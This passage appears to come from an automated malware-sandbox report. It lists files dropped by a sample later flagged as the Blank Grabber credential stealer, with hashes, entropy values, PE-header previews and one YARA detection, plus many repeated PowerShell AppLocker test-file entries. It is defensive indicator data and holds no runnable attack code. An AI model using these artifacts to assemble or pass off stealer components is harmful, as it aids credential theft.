                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI44642\rarreg.key

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\program.exe
                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):456
                                                                                                                                                                                                                                Entropy (8bit):4.447296373872587
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
                                                                                                                                                                                                                                MD5:4531984CAD7DACF24C086830068C4ABE
                                                                                                                                                                                                                                SHA1:FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
                                                                                                                                                                                                                                SHA-256:58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
                                                                                                                                                                                                                                SHA-512:00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI44642\rarreg.key, Author: Joe Security
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI44642\select.pyd

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\program.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):26384
                                                                                                                                                                                                                                Entropy (8bit):7.471075877103443
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:LZPhXaWPBRc6hmfZa7gJXIj2IJ9G46SHQIYiSy1pCQ4HWSJIVE8E9VF0Ny6sC:XaWlspYj2IJ9G4L5YiSyvy2ES
                                                                                                                                                                                                                                MD5:FB70AECE725218D4CBA9BA9BBB779CCC
                                                                                                                                                                                                                                SHA1:BB251C1756E5BF228C7B60DAEA1E3B6E3F9F0FF5
                                                                                                                                                                                                                                SHA-256:9D440A1B8A6A43CFAA83B9BC5C66A9A341893A285E02D25A36C4781F289C8617
                                                                                                                                                                                                                                SHA-512:63E6DB638911966A86F423DA8E539FC4AB7EB7B3FB76C30C16C582CE550F922AD78D1A77FA0605CAFFA524E480969659BF98176F19D5EFFD1FC143B1B13BBAAF
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........tV..'V..'V..'_.j'T..'F:.&T..'F:.&R..'F:.&^..'F:.&Z..'.;.&T..'V..'...'...&S..'.;.&W..'.;.&W..'.;.'W..'.;.&W..'RichV..'................PE..d.....g.........." ...).0..........@.....................................................`......................................... ...L....................`..............l.......................................P...@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI44642\sqlite3.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\program.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):659216
                                                                                                                                                                                                                                Entropy (8bit):7.993010988331354
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:12288:ZI2xdk6g1SJU1uQWhSskWXgN/YeZE21RUMza8WznRGO+4:ZbxYw+AXSskaSweZ91uMu80x+4
                                                                                                                                                                                                                                MD5:21AEA45D065ECFA10AB8232F15AC78CF
                                                                                                                                                                                                                                SHA1:6A754EB690FF3C7648DAE32E323B3B9589A07AF2
                                                                                                                                                                                                                                SHA-256:A1A694B201976EA57D4376AE673DAA21DEB91F1BF799303B3A0C58455D5126E7
                                                                                                                                                                                                                                SHA-512:D5C9DC37B509A3EAFA1E7E6D78A4C1E12B5925B5340B09BEE06C174D967977264C9EB45F146ABED1B1FC8AA7C48F1E0D70D25786ED46849F5E7CC1C5D07AC536
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......gsX.#.6.#.6.#.6.*j../.6.3.7.!.6.3.5.'.6.3.2.+.6.3.3...6.hj7. .6.#.7...6.k.>.".6.k.6.".6.k..".6.k.4.".6.Rich#.6.........................PE..d.....g.........." ...).....0......`.....................................................`..............................................#..........................................................................p...@...........................................UPX0....................................UPX1................................@....rsrc....0.......0..................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI44642\unicodedata.pyd

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\program.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):267024
                                                                                                                                                                                                                                Entropy (8bit):7.9826656358602595
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:5FHvhlPKHwqcv9DqegNsKUuFLttFHg+hMrZ99hYN8khE7xj:5tJlyHwqSBqpNsKUuntFJhMF9HC8jj
                                                                                                                                                                                                                                MD5:B2712B0DD79A9DAFE60AA80265AA24C3
                                                                                                                                                                                                                                SHA1:347E5AD4629AF4884959258E3893FDE92EB3C97E
                                                                                                                                                                                                                                SHA-256:B271BD656E045C1D130F171980ED34032AC7A281B8B5B6AC88E57DCE12E7727A
                                                                                                                                                                                                                                SHA-512:4DC7BD1C148A470A3B17FA0B936E3F5F68429D83D552F80051B0B88818AA88EFC3FE41A2342713B7F0F2D701A080FB9D8AC4FF9BE5782A6A0E81BD759F030922
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Q.............(.....(.....(.....(.....)................).....).....)x....)....Rich..................PE..d.....g.........." ...).........0..P....@...................................0............`..........................................+..X....)....... .......................+..$...................................P...@...........................................UPX0.....0..............................UPX1.........@......................@....rsrc........ ......................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2sddgn3m.dnd.psm1

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2z3ua4vh.miq.ps1

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_34tc1dnw.mz4.psm1

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b4lva2eb.q0f.psm1

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bjzz4fkz.atd.ps1

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eh50eebx.fvw.psm1

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eidononm.vej.ps1

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gd0xw1vb.es3.ps1

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ieupvgui.shy.ps1

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_izwkiqh0.arv.ps1

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kdd1fxpa.3a0.psm1

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pliwwfd4.ojs.psm1

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pm4ajtcm.fwd.ps1

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s3cnl1lk.dh3.psm1

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_shnbdhhu.1s3.psm1

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sl1xchzd.zbp.ps1

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vscodn2v.3go.psm1

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
